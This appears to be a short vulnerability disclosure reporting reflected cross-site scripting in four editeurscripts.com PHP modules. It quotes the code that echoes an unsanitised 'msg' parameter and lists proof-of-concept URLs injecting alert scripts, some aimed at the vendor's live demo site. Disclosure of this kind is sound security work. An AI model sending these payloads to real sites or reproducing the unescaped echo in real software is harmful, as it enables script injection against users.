editeurscripts.com Cross Site Scripting

`#  
# Multiple modules XSS vulnerability with the authors editeurscripts.com  
# Modules Vulnerable:  
# -EScontacts v1.0  
# -EsBaseAdmin v2.1  
# -EsPartenaires v1.0   
# -EsNews v1.2  
#   
#  
# Author: Jonathan Salwan  
# Mail : submit [AT] shell-storm.org  
# Web : http://www.shell-storm.org  
#  
# For the 4 modules, the codes were identical.  
#  
#   
# [...]  
# if ($_GET["msg"] != "")  
# {  
# $msg = str_replace("+"," ",$_GET["msg"]);  
# $msg = stripslashes($msg);  
# echo("<div align=\"center\" class=\"alert\">$msg</div><br />");  
# }  
# [...]   
#   
#  
# Use Vulnerability:  
# ------------------  
#  
# EsContacts v1.0 => http://localhost/EsContacts/login.php?msg=<script>alert('xss');</script>   
#   
# EsBaseAdmin v2.1 => http://localhost/EsBaseAdmin/default/login.php?msg=%3Cscript%3Ealert(%27a%27);%3C/script%3E  
# Live Demo => http://demo.editeurscripts.com/EsBaseAdmin/default/login.php?msg=%3Cscript%3Ealert(%27xss%27);%3C/script%3E  
#  
# EsPartenaires v1.0 => http://localhost/EsPartenaires/login.php?msg=%3Cscript%3Ealert(%27xss%27);%3C/script%3E  
# Live Demo => http://demo.editeurscripts.com/EsPartenaires/login.php?msg=%3Cscript%3Ealert(%27xss%27);%3C/script%3E  
#  
#  
# EsNews v1.2 => http://localhost/EsNews/admin/news/modifier.php?msg=%3Cscript%3Ealert(%27xss%27);%3C/script%3E  
# (not need to be administrator)  
#  
#  
`